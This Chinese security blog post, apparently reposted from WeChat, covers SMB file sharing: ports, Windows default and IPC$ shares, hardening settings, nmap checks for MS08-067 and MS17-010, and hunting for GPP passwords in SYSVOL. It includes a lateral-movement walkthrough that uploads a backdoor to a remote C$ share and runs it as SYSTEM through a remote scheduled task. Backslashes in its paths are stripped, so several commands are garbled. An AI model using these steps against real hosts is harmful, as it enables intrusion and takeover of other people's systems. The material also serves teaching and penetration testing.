关于文件共享服务中的一些安全点

admin 2025年6月4日08:47:58评论46 views字数 3999阅读13分19秒阅读模式

文件共享是大家常用的一种功能,其实在win中的共享功能都是通过smb协议来完成。接下来看看文件共享有哪些需要注意的安全点。

SMB协议

SMB(全称是Server Message Block)是一个协议名,可用于在计算机间共享文件、打印机、串口等,电脑上的网上邻居就是靠它实现的

SMB 是一种客户机/服务器、请求/响应协议。通过 SMB 协议,客户端应用程序可以在各种网络环境下读、写服务器上的文件,以及对服务器程序提出服务请求。此外通过 SMB 协议,应用程序可以访问远程服务器端的文件、以及打印机等资源。

SMB一开始的设计是在NetBIOS协议上运行的,而NetBIOS本身则运行在NetBEUI、IPX/SPX或TCP/IP协议上。

NetBIOS 使用下列端口:UDP/137(NetBIOS 名称服务)、UDP/138(NetBIOS 数据报服务)、TCP/139(NetBIOS 会话服务);

SMB 使用下列端口:TCP/139、TCP/445。

#NetBIOS用于局域网内主机名发现。

smb的密码是否与主机账户的相同‌

系统/场景

用户名密码是否一致

说明

Windows 本地账户

默认使用本地账户凭据

Linux Samba 服务

否(需单独设置)

用户名可相同,密码独立管理

匿名共享

无需密码

通过Everyone用户绕过验证

SMB协议的应用

win的文件共享功能就是通过SMB协议来完成的。

而为了实现linux与win直接的文件共享,开发出了samba软件,可以通过samba实现linux与win之间就像win之间一样文件共享。

在Windows操作系统中的共享有3类:普通共享、默认共享、IPC$共享,

1、普通共享:就是通常意义上的共享,即用户设置的共享目录、共享文件夹、共享分区等;

2、默认共享:Windows操作系统的隐含驱动器共享,通常有:

(1)驱动器共享:如C$、D$,开启后可直接访问分区中资源;

(2)系统管理共享admin$:通常指向C:Windows。

系统安装后大概率都对各个盘符(C$,D$等)和系统目录C:Windows(Admin$)开启默认共享、不过这些目录是只对管理员开放权限

3、IPC$共享:这实际不是共享,而是提供一种访问管道;IPC全称“Internet Process Connection”,顾名思义,是为了进程间通信而开放的命名管道。(IPC$在同一时间内,两个IP之间只允许建立一个连接)

共享中的常用命令

先放一些共享中常用的命令

net use                               #查看连接net share                             #查看本地开启的共享net share ipc$                        #开启ipc$共享net view \IP                          查看远程主机的共享net use \IPipc$ "" /user:""   建立IPC空连接,不需要用户名和密码,一般权限比价低net use \IPipc$ "password" /user:"username"  建立非空连接net time \IP  查看远程主机的当前时间at \ip 时间 程序名  设置定时任务查看目标主机的NetBIOS用户(自己本机也需开启)nbtstat -A 193.168.1.12删除连接net use \193.168.1.12ipc$ /del文件上传下载copy plugin_update.exe \193.168.1.12c$windowstempplugin_update.exe   (上传到目标的:cwindowstemp目录下)copy \127.0.0.1c$test.exe c:(下载到本地c盘下)net share ipc$ /delete删除默认共享  net share c$ /delete删除c盘共享限制IPC$缺省共享:HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Lsa Name:restrictanonymous Type:REG_DWORD Value:0x0(缺省)          0x1 匿名用户无法列举本机用户列表             0x2 匿名用户无法连接本机IPC$共享        说明:不建议使用2,否则可能会造成你的一些服务无法启动,如SQL Server。

IPC$利用

IPC$的利用,主要还是要获取管理员的账号和密码才能去利用,上传文件去获取系统权限。这里有一个问题,那就是如何获取账号密码,这里说一个例子,那就是通过爆破SMB的方式去获取账号密码。

IPC$可能存在空连接漏洞,但是空连接权限很低,win7上连看时间都不能看。

有些主机的 Administrator 管理员的密码为空,那么我们可以尝试连接,现在的大部分系统Administrator账户都是禁用的,就算没禁用,没密码,但是默认的服务器配置也会阻止空密码的连接。

1.如果目标机器启动了IPC$,可以建立空连接,如果知道密码通过密码建立连接。net use \IPipc$ "password" /user:"username"PS. 如口令、用户名为空,则建立了所谓“空连接”,这种连接权限有限,仅为everyone级权限;因此,建议在通过社会工程等手段获取用户、口令后再尝试。2.建立连接后,用net share \目标服务器IP地址查看目标服务器所开放的共享资源,也可以直接尝试上传或访问某个共享(例如:admin$)、确认是否有可以利用的资源或信息;3.建立连接以后可以尝试往目录里复制文件copy 路径srv.exe IP共享目录名,如:copy ccbirds.exe 127.0.0.1c$ 即将当前目录下的文件复制到对方c盘内4.设置计划任务,这样就可以执行copy上去的脚本# 查看目标机器时间net time \193.168.1.12# 创建该时间之后的某个时刻自动执行任务,任务名 test_cronschtasks /create /tn "test_cron" /tr c:windowstempplugin_update.exe /sc once /st 16:32 /S 193.168.1.12 /RU System /u administrator /p "passwd"# 如果不想等,可以立即运行后门程序schtasks /run /tn "test_cron" /S 193.168.1.12 /u administrator /p "passwd"# 删除创建的任务schtasks /F /delete /tn "test_cron" /S 193.168.1.12 /u administrator /p "passwd"

SMB常见的漏洞

MS08-067

CVE-2008-4250微软编号为MS08-067,根据微软安全漏洞公告,基本可以了解其原理:

MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的,而NetPathCanonicalize函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化(将路径字符串中的'/'转换为'',同时去除相对路径"."和".."),而在NetpwPathCanonicalize函数中发生了栈缓冲区内存错误,造成可被利用实施远程代码执行。

nmap检测是否存在该漏洞的命令:nmap --script smb-vuln-ms08-067 192.168.56.101

脚本地址 https://svn.nmap.org/nmap/scripts/smb-vuln-ms08-067.nse

MS17-010

MS17-010(永恒之蓝)应用的不仅仅是一个漏洞,而是包含Windows SMB 远程代码执行漏洞CVE-2017-0143、CVE-2017-0144、CVE-2017-0145、CVE-2017-0146、CVE-2017-0147、CVE-2017-0148在内的6个SMB漏洞的攻击,所以攻击显得十分繁琐。

其它漏洞还有CVE-2009-3103,MS06-025,MS07-029,cve-2020-0796,cve-2020-1301。

可以通过nmap探测是否存在这些漏洞

nmap -p445 --script smb-vuln-* 192.168.56.101
关于文件共享服务中的一些安全点

sysvol与GPP漏洞

上面说的都是本机的共享,其实域内还有一个特殊的共享sysvol。所有域内主机都能访问,里面保存组策略相关数据,包含登录脚本配置文件等

GPP:全称Group Policy Preferences,也就是我们常说的组策略。

sysvol为域内共享文件夹,里面保存着与组策略相关的信息,例如登录或注销脚本,组策略配置文件等,域内主机都能访问。域管理员在使用组策略批量管理域内主机时,如果在脚本或配置中引入用户密码,则会产生安全问题。

还有一种是在组策略首选项中输入了用户名和密码,这样会在相应的组策略文件夹下,有一个xml配置文件包含了以上的信息。针对这个GPP漏洞,微软发布了kb2962486补丁。(MS14-025)

通过对sysvol目录搜索vbs,psl,xml后缀的目录,说不定可以发现用户名和密码或者其他的敏感信息。

sysvol访问路径:\SYSVOL

公司内部使用共享服务是常见的,但在共享的时候要做好权限管理,不要把一些敏感文件分享出去。

总结
本文介绍了关于共享文件中的一些安全点,在内网测试无果时可以翻一下共享的内容。
参考链接
https://xz.aliyun.com/news/11229https://www.cnblogs.com/rookieDanny/p/13037862.html

原文始发于微信公众号(信安路漫漫):关于文件共享服务中的一些安全点

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月4日08:47:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   关于文件共享服务中的一些安全点https://cn-sec.com/archives/4129684.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息